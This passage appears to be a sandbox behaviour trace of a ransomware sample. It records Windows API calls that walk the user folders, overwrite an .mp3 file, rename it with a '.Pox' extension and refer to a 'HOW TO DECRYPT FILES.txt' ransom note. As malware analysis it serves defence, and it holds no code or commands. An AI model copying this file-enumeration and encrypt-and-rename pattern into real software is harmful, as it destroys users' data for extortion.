lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0041.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3e0) returned 1 [0041.315] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae45c | out: lpFileInformation=0x3ae45c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3dc) returned 1 [0041.315] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\tqzmtg594Q.mp3", nBufferLength=0x105, lpBuffer=0x3ade58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\tqzmtg594Q.mp3", lpFilePart=0x0) returned 0x5c [0041.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae34c) returned 1 [0041.315] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\tqzmtg594Q.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\b3hxqdsemcnd0ro\\vvtoiouae6uv8\\tqzmtg594q.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.316] GetFileType (hFile=0x26c) returned 0x1 [0041.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae348) returned 1 [0041.316] GetFileType (hFile=0x26c) returned 0x1 [0041.316] WriteFile (in: hFile=0x26c, lpBuffer=0x246cc04*, nNumberOfBytesToWrite=0x4e30, lpNumberOfBytesWritten=0x3ae408, lpOverlapped=0x0 | out: lpBuffer=0x246cc04*, lpNumberOfBytesWritten=0x3ae408*=0x4e30, lpOverlapped=0x0) returned 1 [0041.317] CloseHandle (hObject=0x26c) returned 1 [0041.318] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\tqzmtg594Q.mp3", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\tqzmtg594Q.mp3", lpFilePart=0x0) returned 0x5c [0041.318] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\tqzmtg594Q.mp3.Pox", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\tqzmtg594Q.mp3.Pox", lpFilePart=0x0) returned 0x60 [0041.318] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3ec) returned 1 [0041.318] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\tqzmtg594Q.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\b3hxqdsemcnd0ro\\vvtoiouae6uv8\\tqzmtg594q.mp3"), fInfoLevelId=0x0, lpFileInformation=0x3ae468 | out: lpFileInformation=0x3ae468*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9598dad0, ftCreationTime.dwHighDateTime=0x1d4d02f, ftLastAccessTime.dwLowDateTime=0xdcaabc90, ftLastAccessTime.dwHighDateTime=0x1d4cb0c, ftLastWriteTime.dwLowDateTime=0x2acfea40, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x4e30)) returned 1 [0041.318] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3e8) returned 1 [0041.319] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\tqzmtg594Q.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\b3hxqdsemcnd0ro\\vvtoiouae6uv8\\tqzmtg594q.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\vVtoiOUAe6UV8\\tqzmtg594Q.mp3.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\b3hxqdsemcnd0ro\\vvtoiouae6uv8\\tqzmtg594q.mp3.pox")) returned 1 [0041.319] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0041.319] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\OneDrive", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\OneDrive", lpFilePart=0x0) returned 0x26 [0041.319] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\OneDrive\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\OneDrive\\", lpFilePart=0x0) returned 0x27 [0041.319] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\OneDrive\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0041.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5dc) returned 1 [0041.321] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0041.321] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games", lpFilePart=0x0) returned 0x29 [0041.321] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpFilePart=0x0) returned 0x2a [0041.321] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0041.321] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.321] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0041.322] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.322] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0041.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5d8) returned 1 [0041.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5e4) returned 1 [0041.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0041.322] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games", lpFilePart=0x0) returned 0x29 [0041.322] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpFilePart=0x0) returned 0x2a [0041.322] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0041.322] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.323] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0041.323] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0041.323] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0041.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5d8) returned 1 [0041.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5e4) returned 1 [0041.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0041.323] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpFilePart=0x0) returned 0x27 [0041.323] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpFilePart=0x0) returned 0x28 [0041.323] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0041.323] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.324] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0041.324] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0041.324] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0041.324] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0041.324] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0041.325] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0041.325] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0041.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5d8) returned 1 [0041.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5e4) returned 1 [0041.325] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0041.325] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpFilePart=0x0) returned 0x27 [0041.325] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpFilePart=0x0) returned 0x28 [0041.325] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0041.325] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.325] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0041.326] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0041.326] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0041.326] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0041.326] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0041.326] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.326] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0041.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5d8) returned 1 [0041.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5e4) returned 1 [0041.327] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0041.327] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links", lpFilePart=0x0) returned 0x2d [0041.327] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpFilePart=0x0) returned 0x2e [0041.327] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0041.327] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.327] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0041.327] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0x0, dwReserved1=0x0, cFileName="Suggested Sites.url", 